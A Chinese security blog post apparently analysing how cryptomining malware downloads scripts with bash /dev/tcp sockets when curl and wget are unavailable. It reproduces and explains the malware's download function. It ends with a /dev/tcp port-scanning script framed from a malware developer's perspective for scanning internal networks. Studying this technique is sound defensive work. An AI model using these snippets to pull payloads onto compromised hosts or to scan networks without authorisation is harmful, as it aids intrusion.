linux在没有curl和wget的情况下如何用shell实现下载功能

最近在分析挖矿木马，发现挖矿木马在入侵后都会对系统自带的部分命令进行替换或劫持。最常见的就是将 wget 和 curl 命令重命名。在多个挖矿木马同时竞争的情况下，没有 wget 和 curl 该如何远程下载挖矿脚本呢？

直接看挖矿脚本是如何实现的。这里面涵盖了很多知识点，非常值得学习！

function DOWNLOAD() {
  read proto server path <<< "${1//"/"/ }"
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80
  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0rnHost: ${HOST}rnrn" >&3
  while IFS= read -r line ; do 
      [[ "$line" == $'r' ]] && break
  done <&3
  nul='&#x0;'
  while IFS= read -d '' -r x || { nul=""; [ -n "$x" ]; }; do 
      printf "%s$nul" "$x"
  done <&3
  exec 3>&-
}

为更好分析是如何实现下载的，我们用 bash -x 来执行脚本打印中间过程。这段 shell 脚本只是把远程服务器上的文件内容输出到屏幕，如果要写入文件可以用重定向符追加到文件。

用 read 读取第一个参数 url 解析赋值得到 path，server 和 port

然后判断 host 和 port 的值是否相等。因为请求的 url 中可能不会带有端口号，此时匹配值就是相同的，该条件为真时就默认 port 为 80 端口。

有人会提问说：要按照上面的代码要请求是https也默认80端口不就报错了吗？

是的，这样只能实现最简单的 http 的请求，https 涉及到证书密钥的传输，实现起来过于复杂。在极端场景下，能实现 http 下载已经可以了。

为什么我上图中 url 参数用的 https 为何也请求成功了？

因为我博客同时允许了 http 和 https 共存，实际上面请求还是用的 http 协议（我也是后面才发现的），如果没有允许 http 协议这里就会报错。

[[ x"${HOST}" == x"${PORT}" ]] 为什么这个判断前面都要加个x呢？

示例：

if [ "x${var}" == "x" ]
if [ x"$DPVS_TYPE" == x"SNAT" ]

目的：防止出现语法错误。

因为如果不写 x，只用 if [ "${var} == "0" ] 来判断 ${var} 的值; 当 ${var} 为空或未设置时，语句被解释为 if [ == "0" ]，出现语法错误。加上 x 后，当 ${var} 为空或未设置时，解释为 if [ "x" == "x" ] ，依然正确。

所以：if [ "x${var}" == "x" ] 整句的意思是判断 ${var} 是否为空。

解释下 exec 3<>/dev/tcp/${HOST}/$PORT 的含义。

看到 /dev/tcp/${HOST}/$PORT 的第一反应就是想到用 bash 反弹 shell，不知道做安全的小伙伴是不是这种感觉。

在 Bash Shell 中打开或关闭 TCP/UDP 套接字

可以使用 bash shell 中的以下语法打开 TCP/UDP 套接字。

$ exec ${file-descriptor} </dev/${protocol}/${host}/${port}

"文件描述符" 是与每个套接字相关联的唯一的非负整数。文件描述符0,1和2分别保留给 stdin，stdout 和 stderr。因此必须指定3或更高（以未使用者为准）作为文件描述符。

"<>"意味着套接字对于读写都是打开的，根据需要，可以打开只读（<）或只写（>）的套接字。"协议"字段可以是 tcp 或 udp

打开后，可以使用以下语法关闭读/写套接字。

$ exec ${file-descriptor} <＆ –  //关闭输入连接
$ exec ${file-descriptor}>＆ – //关闭输出连接

其中 echo 使用了 e n 两个参数：

-e：开启转义
-n：默认echo会在最后输出最后加上一个n换行，使用了该参数后就不会自动加上换行

因为在标准 http 协议中 header 和 body 是用 rnrn 分隔开的。

  while IFS= read -r line ; do 
      [[ "$line" == $'r' ]] && break
  done <&3

-r 屏蔽 ，如果没有该选项，则 作为一个转义字符，有的话 就是个正常的字符了。

这里就是按行读取 header 部分，匹配到 r 就停止读取了。

shell – IFS 分隔符，IFS 是 internal field separator 的缩写，shell 的特殊环境变量。ksh 根据 IFS 存储的值，可以是空格、tab、换行符或者其他自定义符号，来解析输入和输出的变量值。

  nul='�'
  while IFS= read -d '' -r x || { nul=""; [ -n "$x" ]; }; do 
      printf "%s$nul" "$x"
  done <&3
  exec 3>&-

read -d 后面跟一个标志符，其实只有其后的第一个字符有用，作为结束的标志。

这里就是读取 body 部分。exec 3>&- 关闭输出 fd3

短短几行 shell 代码就实现了 linux 的下载功能。并且这里下载需要将结果追加到文件。

下载文件并解压成功

举一反三：

既然在没有 curl 和 wget 的情况下用 shell 实现了下载，那么同样可以借此实现其他功能。

思考一个场景，如果我是挖矿木马的开发者，在内网的情况下没法下载扫描工具的源码（如 masscan）进行编译时候可以用同样的方式来扫描内网呢？

下面是我的思路，一个简单的 demo：

#!/bin/bash


host=$1
port_first=1
port_last=65535
for ((port=$port_first; port<=$port_last; port++))
do
  $(echo >/dev/tcp/$host/$port) >/dev/null 2>&1 && echo "$port open"
done

本文作者：Zgao原文地址：https://zgao.top/linux%e5%9c%a8%e6%b2%a1%e6%9c%89curl%e5%92%8cwget%e7%9a%84%e6%83%85%e5%86%b5%e4%b8%8b%e5%a6%82%e4%bd%95%e7%94%a8shell%e5%ae%9e%e7%8e%b0%e4%b8%8b%e8%bd%bd%e5%8a%9f%e8%83%bd/

原文始发于微信公众号（刨洞安全团队）：linux在没有curl和wget的情况下如何用shell实现下载功能